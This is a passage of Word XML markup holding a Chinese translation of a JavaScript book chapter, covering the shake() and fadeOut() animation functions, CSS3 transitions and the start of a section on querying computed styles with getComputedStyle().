      </w:r>
      <w:r>
        <w:t>函数检查消耗的时间，并更新</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果动画完成，它将</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>还原为原始状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，它更新</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的位置，安排它自身重新运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function animate(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var now=(new </w:t>
      </w:r>
      <w:r>
        <w:t>Date()).getTime();//</w:t>
      </w:r>
      <w:r>
        <w:t>得到当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elapsed=now-start;//</w:t>
      </w:r>
      <w:r>
        <w:t>从开始以来消耗了多长时间？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fraction=elapsed/time;//</w:t>
      </w:r>
      <w:r>
        <w:t>是总时间的几分之几？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(fraction</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>1){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果动画未完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>作为动画完成比例的函数，计算</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用正弦函数将完成比例乘以</w:t>
      </w:r>
      <w:r>
        <w:t>4pi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所以，它来回往复两次</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=distance*Math.sin(fraction*4*Math.PI);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.left=x+"px";//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒后</w:t>
      </w:r>
      <w:r>
        <w:t>或在总时间的最后尝试再次运行函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>目的是为了产生每秒</w:t>
      </w:r>
      <w:r>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:t>帧的动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(animate,Math.min(25,time-elapsed));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，动画完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.cssText=originalStyle//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复原始样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(oncomplete)oncomplete(e);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用完成后的回调函数</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以毫秒级的时间将</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>从完全不透明淡出到完全透明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在调用函数时假设</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>是完全不透明的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//oncomplete</w:t>
      </w:r>
      <w:r>
        <w:t>是一个可选的函数，以</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>为参数，它</w:t>
      </w:r>
      <w:r>
        <w:t>将在动画结束时调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不指定</w:t>
      </w:r>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:t>，默认为</w:t>
      </w:r>
      <w:r>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该函数在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中不能正常工作，但也可以修改得能工作，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>使用非标准的</w:t>
      </w:r>
      <w:r>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function fadeOut(e,oncomplete,time){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof e==="string")e=document.getElementById(e);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!time)time=500;//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Math.sqrt</w:t>
      </w:r>
      <w:r>
        <w:t>作为一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>缓动函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来创建动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>精巧的非线性：一开始淡出得比较快，然后缓慢了一些</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ease=Math.sqrt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var start=(new Date()).getTime();//</w:t>
      </w:r>
      <w:r>
        <w:t>注意：动画开始的时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>animate();//</w:t>
      </w:r>
      <w:r>
        <w:t>动画开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function animate(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elapsed=(new Date()).getTime()-start;//</w:t>
      </w:r>
      <w:r>
        <w:t>消耗的时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fraction=elapsed/time;//</w:t>
      </w:r>
      <w:r>
        <w:t>总时间的几分之几？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(fraction</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>1){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果动画未完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var opacity=1-ease(fraction);//</w:t>
      </w:r>
      <w:r>
        <w:t>计算元素的不透明度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.opacity=String(opacity);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置在</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(animate,//</w:t>
      </w:r>
      <w:r>
        <w:t>调度下一帧</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.min(25,time-elapsed));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，动画完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.opacity="0";//</w:t>
      </w:r>
      <w:r>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>完全透明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(oncomplete)oncomplete(e);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用完成后的回调函数</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shake()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>都能接收可选的回调函数作为第二个参数，如果指定了，当动画结束时函数将被调用。该动画元素将作为回调函数</w:t>
      </w:r>
      <w:r>
        <w:t>的参数传递进去。下面的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码创建了一个按钮，当单击时，它左右震动并淡出：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="shake(this,fadeOut);"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Shake and Fade</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>shake()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>示例函数之间非常类似，都能作为类似</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性动画的模板。客户端类库（如</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>）通常支持预定义视觉效果。因此，除非想创建特别复杂的视觉效果，实际上不用写类似</w:t>
      </w:r>
      <w:r>
        <w:t>shake()</w:t>
      </w:r>
      <w:r>
        <w:t>的动画函数。</w:t>
      </w:r>
      <w:r>
        <w:t>Scriptaculous</w:t>
      </w:r>
      <w:r>
        <w:t>是早期一个值得注意的类库，它是为</w:t>
      </w:r>
      <w:r>
        <w:t>Prototype</w:t>
      </w:r>
      <w:r>
        <w:t>框架设计的。更多信息请访问</w:t>
      </w:r>
      <w:r>
        <w:t>http://script.aculo.us/</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>http://scripty2.com/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了避免使用任何脚本，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>的过渡模块定义了在样式表中指定动画效果的方式。例如，为了替代定义类似</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的函数，可以使用如下的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.fadeable{transition:opacity.5s ease-in}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>它指定了在任何时刻</w:t>
      </w:r>
      <w:r>
        <w:t>"fadeable"</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>属性会变化，该变化会在半秒内用非线性缓动函数的动画（当前值和新值之间）来过渡。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>过渡还未标准化</w:t>
      </w:r>
      <w:r>
        <w:t>，但是已经在</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>中用</w:t>
      </w:r>
      <w:r>
        <w:t>-webkit-transition</w:t>
      </w:r>
      <w:r>
        <w:t>属性实现了一段时间。在写书的这段时间里，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>也用</w:t>
      </w:r>
      <w:r>
        <w:t>-moz-transition</w:t>
      </w:r>
      <w:r>
        <w:t>属性支持过渡。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="416" w:name="16_4_Cha_Xun_Ji_Suan_Chu_De_Yang_Shi_"/>
      <w:r>
        <w:t>16.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　查询计算出的样式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="416"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性代表了元素的内联样式，它覆盖所有的样式表，它是设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性值来改变元素的视觉表现最好的地方。但是，它在查询元素实际应用的样式时用处不大。为此，你想要使用计算样式。元素的计算样式是一组属性值，它由浏览器通过把内联样式结合所有链接样式表中所有可应用的样式规则后导出（或计算）得到的：它就是一组在显示元素时实际使用的属性值。类似内联样式，计算样式也是用一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象来表示的，区别是，计算样式是只读的。虽然不能设置这些样式，但为元素计算出的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDecl</w:t>
      </w:r>
      <w:r>
        <w:t>aration</w:t>
      </w:r>
      <w:r>
        <w:t>对象确切地决定了浏览器在渲染元素时使用的样式属性值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用浏览器窗口对象的</w:t>
      </w:r>
      <w:r>
        <w:t>getComputedStyle()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来获得一个元素的计算样式。此方法的第一个参数就是要获取其计算样式的元素，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第二个参数也是必需的，通常是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或空字符串，但它也可以是命名</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>伪对象的字符串，如</w:t>
      </w:r>
      <w:r>
        <w:t>":before"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>":after"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>":first-line"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>":first-letter"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var title=document.getElementById("section1title");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var titles</w:t>
      </w:r>
      <w:r>
        <w:t>tyles=window.getComputedStyle(element,null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getComputedStyle()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它代表了应用在指定元素（或伪对象）上的所有样式。表示计算样式的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象和表示内联样式的对象之间有一些重要的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>计算样式的属性是只读的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>计算样式的值是绝对值：类似百分比和点之类相对的单位将全部转换为绝对值。所有指定尺寸（例如外边距大小和字体大小）的属性都有一个以像素为度量单位的值</w:t>
      </w:r>
      <w:r>
        <w:t>。该值将是一个冠以</w:t>
      </w:r>
      <w:r>
        <w:t>"px"</w:t>
      </w:r>
      <w:r>
        <w:t>后缀的字符串，使用时仍然需要解析它，但是不用担心单位的解析或转换。其值是颜色的属性将以</w:t>
      </w:r>
      <w:r>
        <w:t>"rgb(#,#,#)"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"rgba(#,#,#,#)"</w:t>
      </w:r>
      <w:r>
        <w:t>的格式返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>不计算复合属性，它们只基于最基础的属性。例如，不要查询</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>属性，应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>marginLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>marginTop</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>计算样式的</w:t>
      </w:r>
      <w:r>
        <w:t>cssText</w:t>
      </w:r>
      <w:r>
        <w:t>属性未定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算样式和内联样式可以同时使用。例</w:t>
      </w:r>
      <w:r>
        <w:t>16-4</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scaleColor()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。一个用来查询和解析指定元素的计算文本尺寸，另一个查询和解析元素的计算</w:t>
      </w:r>
      <w:r>
        <w:t>背景颜色。两个函数都将结果值按比例缩放并作为元素的内联样式设置缩放值。（这些函数在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>和更早期的版本中无法工作：下面会讨论到，这些版本的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>getComputedStyle()</w:t>
      </w:r>
      <w:r>
        <w:t>。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>16-4</w:t>
      </w:r>
      <w:r>
        <w:t>：查询计算样式与设置内联样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
